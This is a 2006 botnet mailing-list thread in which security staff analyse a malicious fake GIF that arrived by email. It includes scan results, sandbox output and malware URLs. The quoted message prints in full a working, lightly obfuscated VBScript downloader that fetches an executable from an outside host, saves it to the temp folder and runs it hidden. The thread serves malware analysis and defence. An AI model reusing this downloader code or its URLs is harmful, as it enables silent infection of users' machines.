To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Some interesting strings from lula.cmd:

http://www.lasgo.be/mp3.php?id=455
\imgrt.scr
\nostd.scr
\bsys.scr


On Fri, Dec 29, 2006 at 12:06:43PM -0500, Tom babbled thus:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> This one was new to me. A gif that wasn't. Came via email. Link was
> to http://lulavergonha.rg3.net which framed a gif
> (http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would
> not deal with. Does explorer really open these?
> 
> Anyway, content of gif had javascript to download the malware
> (beware below is an active link as of this email):
> 
> <script language="VBScript">
> 
>      on error resume next
> 
> 
> 
>      ' due to how ajax works, the file MUST be within the same local domain
>      dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd";
> 
>      ' create adodbstream object
>      Set df = document.createElement("object")
>      df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
>      str="Microsoft.XMLHTTP"
>      Set x = df.CreateObject(str,"")
> 
>      a1="Ado"
>      a2="db."
>      a3="Str"
>      a4="eam"
>      str1=a1&a2&a3&a4
>      str5=str1
>      set S = df.createobject(str5,"")
>      S.type = 1
> 
>      ' xml ajax req
>      str6="GET"
>      x.Open str6, dl, False
>      x.Send
> 
>      ' Get temp directory and create our destination name
>      fname1="pork.exe"
>      set F = df.createobject("Scripting.FileSystemObject","")
>      set tmp = F.GetSpecialFolder(2) ' Get tmp folder
>      fname1= F.BuildPath(tmp,fname1)
>      S.open
>      ' open adodb stream and write contents of request to file
>      ' like vbs dl exec code
>      S.write x.responseBody
>      ' Saves it with CreateOverwrite flag
>      S.savetofile fname1,2
> 
>      S.close
>      set Q = df.createobject("Shell.Application","")
>      Q.ShellExecute fname1,"","","open",0
> 
> 
> 
>      </script>
> 
> [ scan result ]
> AntiVir            7.3.0.21/20061229        found [TR/Delphi.Downloader.Gen]
> Authentium         4.93.8/20061229          found nothing
> Avast              4.7.892.0/20061221       found nothing
> AVG                386/20061229             found nothing
> BitDefender        7.2/20061229             found [Trojan.Downloader.Banload.MG]
> CAT-QuickHeal      8.00/20061229            found nothing
> ClamAV             devel-20060426/20061229  found nothing
> DrWeb              4.33/20061229            found nothing
> eSafe              7.0.14.0/20061228        found nothing
> eTrust-InoculateIT 23.73.101/20061229       found nothing
> eTrust-Vet         30.3.3289/20061229       found nothing
> Ewido              4.0/20061229             found [Downloader.Delf.acn]
> F-Prot             3.16f/20061229           found nothing
> F-Prot4            4.2.1.29/20061229        found nothing
> Fortinet           2.82.0.0/20061229        found nothing
> Ikarus             T3.1.0.27/20061229       found [Trojan-Downloader.Win32.Dadobra.CV]
> Kaspersky          4.0.2.24/20061229        found nothing
> McAfee             4928/20061228            found nothing
> Microsoft          1.1904/20061227          found nothing
> NOD32v2            1946/20061229            found [probably a variant of Win32/TrojanDownloader.Banload.BAY]
> Norman             5.80.02/20061229         found [W32/Downloader]
> Panda              9.0.0.4/20061228         found [Suspicious file]
> Prevx1             V2/20061229              found nothing
> Sophos             4.13.0/20061228          found nothing
> Sunbelt            2.2.907.0/20061218       found nothing
> TheHacker          6.0.3.139/20061229       found nothing
> UNA                1.83/20061228            found nothing
> VBA32              3.11.1/20061229          found nothing
> VirusBuster        4.3.19:9/20061229        found nothing
> 
> [ notes ]
> norman sandbox: [ General information ]
>      * **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
>      * File length:        43520 bytes.
> 
>   [ Changes to filesystem ]
>      * Creates file C:\WINDOWS\SYSTEM32\imgrt.scr.
> 
>   [ Network services ]
>      * Downloads file from http://www.aquipodeserbom.xpg.com.br/firma01.bmp as C:\WINDOWS\SYSTEM32\imgrt.scr.
> 
>   [ Security issues ]
>      * Starting downloaded file - potential security problem.
> 
> 
> 
> -- 
> 
> Tom Shaw - Chief Engineer, OITC
> <[EMAIL PROTECTED]>, http://www.oitc.com/
> US Phone Numbers: 321-984-3714, 321-729-6258(fax), 
> 321-258-2475(cell/voice mail,pager)
> Text Paging: http://www.oitc.com/Pager/sendmessage.html
> AIM/iChat: [EMAIL PROTECTED]
> Google Talk: [EMAIL PROTECTED]
> skype: trshaw

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
